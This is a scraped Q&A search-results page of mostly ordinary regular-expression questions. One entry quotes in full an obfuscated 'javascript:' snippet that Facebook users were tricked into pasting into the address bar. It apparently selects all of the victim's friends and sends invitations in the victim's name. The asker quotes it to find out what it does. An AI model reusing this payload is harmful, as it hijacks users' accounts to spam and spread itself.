Search Results

Search found 17715 results on 709 pages for 'regular language'.

Page 72/709 | < Previous Page | 68 69 70 71 72 73 74 75 76 77 78 79  | Next Page >

  • Getting specific values with regex

    - by David
    I need to knowingly isolate each row of the vCard and get its value. For instance, I want to get "5555" from X-CUSTOMFIELD. So far, my thoughts are: "X-CUSTOMFIELD;\d+" I have been looking at some tutorials and I am a little confused with what function to use? What would my regex above return? Would it give me the whole line or just the numerical part (5555)? I was thinking I i get the whole row, I can use substring to get the digits? BEGIN:VCARD VERSION:2.1 N:Last;First; FN:First Last TEL;HOME;VOICE:111111 TEL;MOBILE;VOICE:222222 X-CUSTOMFIELD;5555 END:VCARD

    Read the article

  • What exactly does this piece of JavaScript do?

    - by helpmarnie
    I saw this page growing in popularity among my social circles on Facebook, what 98 percent bla bla... and it walks users through copying the below JavaScript (I added some indentation to make it more readable) into their address bar. Looks dodgy to me, but I only have a very basic knowledge of JavaScript. Simply put, what does this do? javascript:(function(){ a='app120668947950042_jop'; b='app120668947950042_jode'; ifc='app120668947950042_ifc'; ifo='app120668947950042_ifo'; mw='app120668947950042_mwrapper'; eval(function(p,a,c,k,e,r){ e=function(c){ return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))} ; if(!''.replace(/^/,String)){ while(c--)r[e(c)]=k[c]||e(c); k=[function(e){ return r[e]} ]; e=function(){ return'\\w+'} ; c=1} ; while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]); return p} ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"]; d=U; d[e[2]](V)[e[1]][e[0]]=e[3]; d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]]; s=d[e[2]](e[6]); m=d[e[2]](e[7]); c=d[e[9]](e[8]); c[e[11]](e[10],I,I); s[e[12]](c); C(D(){ W[e[13]]()} ,E); C(D(){ X[e[16]](e[14],e[15])} ,E); C(D(){ m[e[12]](c); d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]} ,E); ',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{ } ))})();

    Read the article

  • Find everthing that is not between specific tags

    - by murze
    Hi, i'm using preg_match_all('/<?(.*)?>/', $bigString, $matches, PREG_OFFSET_CAPTURE); to find the contents of everthing between '' Now I'd like to find everthing that is NOT between '' I'm trying with preg_match_all('/^(<?(.*)?>)/', $bigString, $nonmatches, PREG_OFFSET_CAPTURE); but that doesn't seem to work... How can i find everthing that is not between '' ?

    Read the article

  • How do I test against a large number of regular expressions quickly and know which one matched?

    - by Jack
    I'm writing a program in .net where the user may provide a large number of regular expressions. For a given string, I need to figure out which regular expression matches that string (if more than one matches, I just need the first one that matches). However, if there are a large number of regular expressions this operation can take a very long time. I was somewhat hoping there would be something similar to flex for .net that would allow me to specify a large number of regular expressions yet quickly (O(n) according to Wikipedia for n = len(input string)) figure out which regular expression matches. Also, I would prefer not to implement my own regular expression engine :).

    Read the article

  • negative look ahead to exclude html tags

    - by Remoh
    I'm trying to come up with a validation expression to prevent users from entering html or javascript tags into a comment box on a web page. The following works fine for a single line of text: ^(?!.(<|)).$ ..but it won't allow any newline characters because of the dot(.). If I go with something like this: ^(?!.(<|))(.|\s)$ it will allow multiple lines but the expression only matches '<' and '' on the first line. I need it to match any line. This works fine: ^[-_\s\d\w"'.,:;#/&\$\%\?!@+*\()]{0,4000}$ but it's ugly and I'm concerned that it's going to break for some users because it's a multi-lingual application. Any ideas? Thanks!

    Read the article

  • regular expression for validation not working

    - by Camran
    I have a "description textarea" inside a form where user may enter a description for an item. This is validated with javascript before the form beeing submitted. One of the validation-steps is this: else if (!fld.value.match(desExp)){ And desExp: var desExp = /^\s*(\w[^\w]*){3}.*$/gm; Now my problem, this works fine on all cases except for descriptions where the description BEGINS with a special character of the swedish language (å, ä, ö). This wont work: åäö hello world But this will: hello world åäö Any fixes? Thanks

    Read the article

  • Substitute all matches with values in Ruby regular expression

    - by Lewisham
    Hi all, I'm having a problem with getting a Ruby string substitution going. I'm writing a preprocessor for a limited language that I'm using, that doesn't natively support arrays, so I'm hacking in my own. I have a line: x[0] = x[1] & x[1] = x[2] I want to replace each instance with a reformatted version: x__0 = x__1 & x__1 = x__2 The line may include square brackets elsewhere. I've got a regex that will match the array use: array_usage = /(\w+)\[(\d+)\]/ but I can't figure out the Ruby construct to replace each instance one by one. I can't use .gsub() because that will match every instance on the line, and replace every array declaration with whatever the first one was. .scan() complains that the string is being modified if you try and use scan with a .sub()! inside a block. Any ideas would be appreciated!

    Read the article

  • RegEx - Time Validation ((h)h:mm)

    - by Josh
    /^\d{1,2}[:][0-5][0-9]$/ is what I have. this limits minutes to 00-59. It does not, however, limit hours to between 0 and 12. For similarity and uniformity I would like to do this with RegEx alone if possible. Further-more I would like the first digit to be optional. i.e. 09:30 accepted as well as 9:30. I played around with ranges, but something out of range is always acceptable.

    Read the article

  • How to make firefox to spellcheck in multiple languages simultaneously?

    - by Vi
    I want to it to assume that text may be in mixture of languages and words should be looked up in multiple dictionaries. (E.g. everything in en-GB, en-US, ru, be and be-classic should be consider as good, everything else should be underlined and corrections from all dictionaries should be offered). Is there an add-on for "multi-language spell-check"? Alternatively, can I merge all dictionaries into one big combined dictionary?

    Read the article

  • TTStyledTextLabel offset between link and regular text when changing from default font

    - by Guy Ephraim
    I'm using Three20 TTStyledTextLabel and when I change the default font (Helvetica) to something else it creates some kind of height difference between links and regular text The following code demonstrate my problem: #import <Three20/Three20.h> @interface TestController : UIViewController { } @end @implementation TestController -(id)init{ self = [super init]; TTStyledTextLabel* label = [[[TTStyledTextLabel alloc] initWithFrame:CGRectMake(0, 0, 320, 230)] autorelease]; label.text = [TTStyledText textFromXHTML:@"<a href=\"aa://link1\">link</a> text" lineBreaks:YES URLs:YES]; [label setFont:[UIFont systemFontOfSize:16]]; [[self view] addSubview:label]; TTStyledTextLabel* label2 = [[[TTStyledTextLabel alloc] initWithFrame:CGRectMake(0, 230, 320, 230)] autorelease]; label2.text = [TTStyledText textFromXHTML:@"<a href=\"aa://link1\">link2</a> text2" lineBreaks:YES URLs:YES]; [label2 setFont:[UIFont fontWithName:@"HelveticaNeue" size:16]]; [[self view] addSubview:label2]; return self; } @end In the screen shot you can see that the first link is aligned and the second one isn't How do I fix it? I think there is a bug in the TTStyledTextLabel code...

    Read the article

  • Psychology researcher wants to learn new language

    - by user273347
    I'm currently considering R, matlab, or python, but I'm open to other options. Could you help me pick the best language for my needs? Here are the criteria I have in mind (not in order): Simple to learn. I don't really have a lot of free time, so I'm looking for something that isn't extremely complicated and/or difficult to pick up. I know some C, FWIW. Good for statistics/psychometrics. I do a ton of statistics and psychometrics analysis. A lot of it is basic stuff that I can do with SPSS, but I'd like to play around with the more advanced stuff too (bootstrapping, genetic programming, data mining, neural nets, modeling, etc). I'm looking for a language/environment that can help me run my simpler analyses faster and give me more options than a canned stat package like SPSS. If it can even make tables for me, then it'll be perfect. I also do a fair bit of experimental psychology. I use a canned experiment "programming" software (SuperLab) to make most of my experiments, but I want to be able to program executable programs that I can run on any computer and that can compile the data from the experiments in a spreadsheet. I know python has psychopy and pyepl and matlab has psychtoolbox, but I don't know which one is best. If R had something like this, I'd probably be sold on R already. I'm looking for something regularly used in academe and industry. Everybody else here (including myself, so far) uses canned stat and experiment programming software. One of the reasons I'm trying to learn a programming language is so that I can keep up when I move to another lab. Looking forward to your comments and suggestions. Thank you all for your kind and informative replies. I appreciate it. It's still a tough choice because of so many strong arguments for each language. Python - Thinking about it, I've forgotten so much about C already (I don't even remember what to do with an array) that it might be better for me to start from scratch with a simple program that does what it's supposed to do. It looks like it can do most of the things I'll need it to do, though not as cleanly as R and MATLAB. R - I'm really liking what I'm reading about R. The packages are perfect for my statistical work now. Given the purpose of R, I don't think it's suited to building psychological experiments though. To clarify, what I mean is making a program that presents visual and auditory stimuli to my specifications (hundreds of them in a preset and/or randomized sequence) and records the response data gathered from participants. MATLAB - It's awesome that cognitive and neuro folk are recommending MATLAB, because I'm preparing for the big leap from social and personality psychology to cognitive neuro. The problem is the Uni where I work doesn't have MATLAB licenses (and 3750 GBP for a compiler license is not an option for me haha). Octave looks like a good alternative. PsychToolbox is compatible with Octave, thankfully. SQL - Thanks for the tip. I'll explore that option, too. Python will be the least backbreaking and most useful in the short term. R is well suited to my current work. MATLAB is well suited to my prospective work. It's a tough call, but I think I am now equipped to make a more well-informed decision about where to go next. Thanks again!

    Read the article

  • Getting text between quotes using regular expression

    - by Camsoft
    I'm having some issues with a regular expression I'm creating. I need a regex to match against the following examples and then sub match on the first quoted string: Input strings ("Lorem ipsum dolor sit amet, consectetur adipiscing elit.") ('Lorem ipsum dolor sit amet, consectetur adipiscing elit. ') ('Lorem ipsum dolor sit amet, consectetur adipiscing elit. ', 'arg1', "arg2") Must sub match Lorem ipsum dolor sit amet, consectetur adipiscing elit. Regex so far: \((["'])([^"']+)\1,?.*\) The regex does a sub match on the text between the first set of quotes and returns the sub match displayed above. This is almost working perfectly, but the problem I have is that if the quoted string contains quotes in the text the sub match stops at the first instance, see below: Failing input strings ("Lorem ipsum dolor \"sit\" amet, consectetur adipiscing elit.") Only sub matches: Lorem ipsum dolor ("Lorem ipsum dolor 'sit' amet, consectetur adipiscing elit.") The entire match fails. Notes The input strings are actually php code function calls. I'm writing a script that will scan .php source files for a specific function and grab the text from the first parameter.

    Read the article

  • xVal and Regular Expression Match

    - by gmcalab
    I am using xVal to validate my forms in asp.net MVC 1.0 Not sure why my regular expression isn't validating correctly. It validates with the value of "12345" It validates with the value of "12345 " It validates with the value of "12345 -" It validates with the value of "12345 -1" It validates with the value of "12345 -12" ... etc For a zip code I expect one of the two patterns: 12345 or 12345 -1234 Here are the two regex I tried: (\d{5})((( -)(\d{4}))?) (\d{5})|(\d{5} -\d{4}) Here is my MetaData class for xVal [MetadataType(typeof(TIDServiceMetadata))] public class TIDServiceStep : TIDDetail { public class TIDServiceMetadata { [Required(ErrorMessage = " [Required] ")] [RegularExpression(@"(\d{5})|(\d{5} -\d{4})", ErrorMessage = " Invalid Zip ")] public string Zip { get; set; } } } Here is my aspx page: <% Html.BeginForm("Edit", "Profile", FormMethod.Post); %> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td> <h6>Zip:</h6> </td> <td> <%= Html.TextBox("Profile.Zip")%> </td> </tr> <tr> <td> <input type="submit"/> </td> </tr> </table> <% Html.EndForm(); %> <% Html.Telerik().ScriptRegistrar() .OnDocumentReady(() => { %> <%= Html.ClientSideValidation<TIDProfileStep>("Profile").SuppressScriptTags() %> <% }); %>

    Read the article

  • SoundManager / Jquery / Regular expression : Parse class name before certain character To Get SoundI

    - by j-man86
    So I am trying to access a jquery soundmanager variable from one script (wpaudio.js – from the wp-audio plugin) inside of another (init.js – my own javascript). I am creating an alternate pause/play button higher up on the page and need to resume the current soundID, which is contained as part of a class name in the DOM. Here is the code that creates that class name in wpaudio.js: function wpaButtonCheck() { if (!this.playState || this.paused) jQuery('#' + this.sID + '_play').attr('src', wpa_url + '/wpa_play.png'); else jQuery('#' + this.sID + '_play').attr('src', wpa_url + '/wpa_pause.png'); } Here is the output: where wpa0 would be the sID of the sound I need. My current script in init.js is: $('.mixesSidebar #currentSong .playBtn').toggle(function() { soundManager.pauseAll(); $(this).addClass('paused'); }, function() { soundManager.resumeAll(); $(this).removeClass('paused'); }); I need to change resumeAll to "resume(this.sID)", but I need to somehow store the sID onclick and call it in the above function. Alternately, I think a regular expression that could get the class name of the current play button and either parse the string up to the "_play" or use a trim function to get rid of "_play"– but I'm not sure how to do this. Thanks for your help!

    Read the article

  • Some regular expression help?

    - by Rohan
    Hey there. I'm trying to create a Regex javascript split, but I'm totally stuck. Here's my input: 9:30 pm The user did action A. 10:30 pm Welcome, user John Doe. ***This is a comment 11:30 am This is some more input. I want the output array after the split() to be (I've removed the \n for readability): ["9:30 pm The user did action A.", "10:30 pm Welcome, user John Doe.", "***This is a comment", "11:30 am This is some more input." ]; My current regular expression is: var split = text.split(/\s*(?=(\b\d+:\d+|\*\*\*))/); This works, but there is one problem: the timestamps get repeated in extra elements. So I get: ["9:30", "9:30 pm The user did action A.", "10:30", "10:30 pm Welcome, user John Doe.", "***This is a comment", "11:30", "11:30 am This is some more input." ]; I cant split on the newlines \n because they aren't consistent, and sometimes there may be no newlines at all. Could you help me out with a Regex for this? Thanks so much!!

    Read the article

  • Regular Expression doesn't match

    - by dododedodonl
    Hi All, I've got a string with very unclean HTML. Before I parse it, I want to convert this: <TABLE><TR><TD width="33%" nowrap=1><font size="1" face="Arial"> NE </font> </TD> <TD width="33%" nowrap=1><font size="1" face="Arial"> DEK </font> </TD> <TD width="33%" nowrap=1><font size="1" face="Arial"> 143 </font> </TD> </TR></TABLE> in NE DEK 143 so it is a bit easier to parse. I've got this regular expression (RegexKitLite): NSString *str = [dataString stringByReplacingOccurrencesOfRegex:@"<TABLE><TR><TD width=\"33%\" nowrap=1><font size=\"1\" face=\"Arial\">(.+?)<\\/font> <\\/TD>(.+?)<TD width=\"33%\" nowrap=1><font size=\"1\" face=\"Arial\">(.+?)<\\/font> <\\/TD>(.+?)<TD width=\"33%\" nowrap=1><font size=\"1\" face=\"Arial\">(.+?)<\\/font> <\\/TD>(.+?)<\\/TR><\\/TABLE>" withString:@"$1 $3 $5"]; I'm no an expert in Regex. Can someone help me out here? Regards, dodo

    Read the article

  • Treetop basic parsing and regular expression usage

    - by ucint
    I'm developing a script using the ruby Treetop library and having issues working with its syntax for regex's. First off, many regular expressions that work in other settings dont work the same in treetop. This is my grammar: (myline.treetop) grammar MyLine rule line string whitespace condition end rule string [\S]* end rule whitespace [\s]* end rule condition "new" / "old" / "used" end end This is my usage: (usage.rb) require 'rubygems' require 'treetop' require 'polyglot' require 'myline' parser = MyLineParser.new p parser.parse("randomstring new") This should find the word new for sure and it does! Now I wont to extend it so that it can find new if the input string becomes "randomstring anotherstring new yetanother andanother" and possibly have any number of strings followed by whitespace (tab included) before and after the regex for rule condition. In other words, if I pass it any sentence with the word "new" etc in it, it should be able to match it. So let's say I change my grammar to: rule line string whitespace condition whitespace string end Then, it should be able to find a match for: p parser.parse("randomstring new anotherstring") So, what do I have to do to allow the string whitespace to be repeated before and after condition? If I try to write this: rule line (string whitespace)* condition (whitespace string)* end , it goes in an infinite loop. If i replace the above () with [], it returns nil In general, regex's return a match when i use the above, but treetop regex's dont. Does anyone have any tips/points on how to go about this? Plus, since there isn't much documentation for treetop and the examples are either too trivial or too complex, is there anyone who knows a more thorough documentation/guide for treetop?

    Read the article

  • SQL with Regular Expressions vs Indexes with Logical Merging Functions

    - by geeko
    Hello Lads, I am trying to develop a complex textual search engine. I have thousands of textual pages from many books. I need to search pages that contain specified complex logical criterias. These criterias can contain virtually any compination of the following: A: Full words. B: Word roots (semilar to stems; i.e. all words with certain key letters). C: Word templates (in some languages are filled in certain templates to form various part of speech such as adjactives, past/present verbs...). D: Logical connectives: AND/OR/XOR/NOT/IF/IFF and parentheses to state priorities. Now, would it be faster to have the pages' full text in database (not indexed) and search though them all using SQL and Regular Expressions ? Or would it be better to construct indexes of word/root/template-page-location tuples. Hence, we can boost searching for individual words/roots/templates. However, it gets tricky as we interdouce logical connectives into our query. I thought of doing the following steps in such cases: 1: Seperately search for each individual words/roots/templates in the specified query. 2: On priority bases, we merge two result lists (from step 1) at a time depedning on the logical connective For example, if we are searching for "he AND (is OR was)": 1: We shall search for "he", "is" and "was" seperately and get result lists for each word. 2: Merge the result lists of "is" and "was" using the merging function OR-MERGE 3: Merge the merged result list from the OR-MERGE function with the one of "he" using the merging function AND-MERGE The result of step 3 is then returned as the result of the specified query. What do you think gurues ? Which is faster ? Any better ideas ? Thank you all in advance.

    Read the article

  • Extracting one word based on special character using Regular Expression in C#

    - by Jankhana
    I am not very good at regular expression but want to do some thing like this : string="c test123 d split" I want to split the word based on "c" and "d". this can be any word which i already have. The string will be given by the user. i want "test123" and "split" as my output. and there can be any number of words i.e "c test123 d split e new" etc. c d e i have already with me. I want just the next word after that word i.e after c i have test123 and after d i have split and after e i have new so i need test123 and split and new. how can I do this??? And one more thing I will pass just c first than d and than e. not together all of them. I tried string strSearchWord="c "; Regex testRegex1 = new Regex(strSearchWord); List lstValues = testRegex1.Split("c test123 d split").ToList(); But it's working only for last character i.e for d it's giving the last word but for c it includes test123 d split. How shall I do this???

    Read the article

  • Regular expression either/or not matching everything

    - by dwatransit
    I'm trying to parse an HTTP GET request to determine if the url contains any of a number of file types. If it does, I want to capture the entire request. There is something I don't understand about ORing. The following regular expression only captures part of it, and only if .flv is the first int the list of ORd values. (I've obscured the urls with spaces because Stackoverflow limits hyperlinks) regex: GET.?(.flv)|(.mp4)|(.avi).? test text: GET http: // foo.server.com/download/0/37/3000016511/.flv?mt=video/xy match output: GET http: // foo.server.com/download/0/37/3000016511/.flv I don't understand why the .*? at the end of the regex isnt callowing it to capture the entire text. If I get rid of the ORing of file types, then it works. Here is the test code in case my explanation doesn't make sense: public static void main(String[] args) { // TODO Auto-generated method stub String sourcestring = "GET http: // foo.server.com/download/0/37/3000016511/.flv?mt=video/xy"; Pattern re = Pattern.compile("GET .?\.flv."); // this works //output: // [0][0] = GET http :// foo.server.com/download/0/37/3000016511/.flv?mt=video/xy // the match from the following ends with the ".flv", not the entire url. // also it only works if .flv is the first of the 3 ORd options //Pattern re = Pattern.compile("GET .?(\.flv)|(\.mp4)|(\.avi).?"); // output: //[0][0] = GET http: // foo.server.com/download/0/37/3000016511/.flv // [0][1] = .flv // [0][2] = null // [0][3] = null Matcher m = re.matcher(sourcestring); int mIdx = 0; while (m.find()){ for( int groupIdx = 0; groupIdx < m.groupCount()+1; groupIdx++ ){ System.out.println( "[" + mIdx + "][" + groupIdx + "] = " + m.group(groupIdx)); } mIdx++; } } }

    Read the article

  • I need to remove Java Script tags using regular expressions and JRegex

    - by piotr
    I need to remove all the Java Script tags and the content in between and style tags from the HTML code of web pages.So far I've come up with this expression : "(<[ \r\n\t]script([ \r\n\t]|){1,}([ \r\n\t]|.)?)|(<[ \r\n\t]noscript([ \r\n\t]|){1,}([ \r\n\t]|.)?)|(<[ \r\n\t]style([ \r\n\t]|){1,}([ \r\n\t]|.)?)" I use JRegex library to work with regular expressions. When I test it in any regex tester it works just fine, but once I run my program - it all crashes down with this error report: Exception in thread "Thread-0" java.lang.StackOverflowError at java.util.regex.Pattern$BranchConn.match(Unknown Source) at java.util.regex.Pattern$BmpCharProperty.match(Unknown Source) at java.util.regex.Pattern$Branch.match(Unknown Source) at java.util.regex.Pattern$GroupHead.match(Unknown Source) at java.util.regex.Pattern$LazyLoop.match(Unknown Source) at java.util.regex.Pattern$GroupTail.match(Unknown Source) at java.util.regex.Pattern$BranchConn.match(Unknown Source) at java.util.regex.Pattern$CharProperty.match(Unknown Source) at java.util.regex.Pattern$Branch.match(Unknown Source) at java.util.regex.Pattern$GroupHead.match(Unknown Source) at java.util.regex.Pattern$LazyLoop.match(Unknown Source) .................................. And it keeps on going forever. If anyone can give me an advice on this one - I'll be very grateful.

    Read the article

  • Python Regular Expressions: Capture lookahead value (capturing text without consuming it)

    - by Lattyware
    I wish to use regular expressions to split words into groups of (vowels, not_vowels, more_vowels), using a marker to ensure every word begins and ends with a vowel. import re MARKER = "~" VOWELS = {"a", "e", "i", "o", "u", MARKER} word = "dog" if word[0] not in VOWELS: word = MARKER+word if word[-1] not in VOWELS: word += MARKER re.findall("([%]+)([^%]+)([%]+)".replace("%", "".join(VOWELS)), word) In this example we get: [('~', 'd', 'o')] The issue is that I wish the matches to overlap - the last set of vowels should become the first set of the next match. This appears possible with lookaheads, if we replace the regex as follows: re.findall("([%]+)([^%]+)(?=[%]+)".replace("%", "".join(VOWELS)), word) We get: [('~', 'd'), ('o', 'g')] Which means we are matching what I want. However, it now doesn't return the last set of vowels. The output I want is: [('~', 'd', 'o'), ('o', 'g', '~')] I feel this should be possible (if the regex can check for the second set of vowels, I see no reason it can't return them), but I can't find any way of doing it beyond the brute force method, looping through the results after I have them and appending the first character of the next match to the last match, and the last character of the string to the last match. Is there a better way in which I can do this? The two things that would work would be capturing the lookahead value, or not consuming the text on a match, while capturing the value - I can't find any way of doing either.

    Read the article

  • Regular expression of unicode characters on string

    - by Marcus King
    I'm working in c# doing some OCR work and have extracted the text I need to work with. Now I need to parse a line using Regular Expressions. string checkNum; string routingNum; string accountNum; Regex regEx = new Regex(@"\u9288\d+\u9288"); Match match = regEx.Match(numbers); if (match.Success) checkNum = match.Value.Remove(0, 1).Remove(match.Value.Length - 1, 1); regEx = new Regex(@"\u9286\d{9}\u9286"); match = regEx.Match(numbers); if(match.Success) routingNum = match.Value.Remove(0, 1).Remove(match.Value.Length - 1, 1); regEx = new Regex(@"\d{10}\u9288"); match = regEx.Match(numbers); if (match.Success) accountNum = match.Value.Remove(match.Value.Length - 1, 1); The problem is that the string contains the necessary unicode characters when I do a .ToCharArray() and inspect the contents of the string, but it never seems to recognize the unicode characters when I parse the string looking for them. I thought strings in C# were unicode by default.

    Read the article

  • Regular Expression Newbie

    - by Registered User
    I need to parse strings inputs where the columns are separated by columns and any field that contains a comma in the data is wrapped in quotes (commas separated, quoted text identifiers). For this project I need to remove the quotes and any commas that occur between pairs of quotes. Basically, I need to remove commas and quotes that are contained in fields while preserving the commas that are used to separate the fields. Here's a little code I put together that handles the simple scenario: // Sample input 1: This works and covers 99% of the records that I need to parse. string str1 = "[email protected],2010/03/27 12:2:02,,some_first_name,some_last_name,,\"This Address Works, Suite 200\",Some City,TN,09876-5432,9795551212x123,XYZ"; str1 = Regex.Replace(str1, "\"([^\"^,]*),([^\"^,]*)\"", "$1$2"); Console.WriteLine(str1); // Outputs: [email protected],2010/03/27 12:2:02,,some_first_name,some_last_name,,This Address Works Suite 200,Some City,TN,09876-5432,9795551212x123,XYZ Although this code works for most of my records, it doesn't work when a field contains more than one commas. What I would like to do is modify the code so that it remove each instance of a comma contained within the column no matter how many commas there are in the field. I don't want to hard code only handling 2 commas, or 3 commas, or 25 commas. The code should just remove all the commas in the field. Below is an example of what my code doesn't handle properly. // Sample input 2: This doesn't work since there is more than 1 comma between the quotes. string str2 = "[email protected],2010/03/27 12:2:02,,some_first_name,some_last_name,,\"i,l,k,e, c,o,m,m,a,s, i,n ,m,y, f,i,e,l,d\",Some City,TN,09876-5432,9795551212x123,XYZ"; str2 = Regex.Replace(str2, "\"([^\"^,]*),([^\"^,]*)\"", "$1$2"); Console.WriteLine(str2); // Desired output: [email protected],2010/03/27 12:2:02,,some_first_name,some_last_name,,i like commas in my field,Some City,TN,09876-5432,9795551212x123,XYZ Any help would be appreciated for this Regular Expression newbie.

    Read the article

< Previous Page | 68 69 70 71 72 73 74 75 76 77 78 79  | Next Page >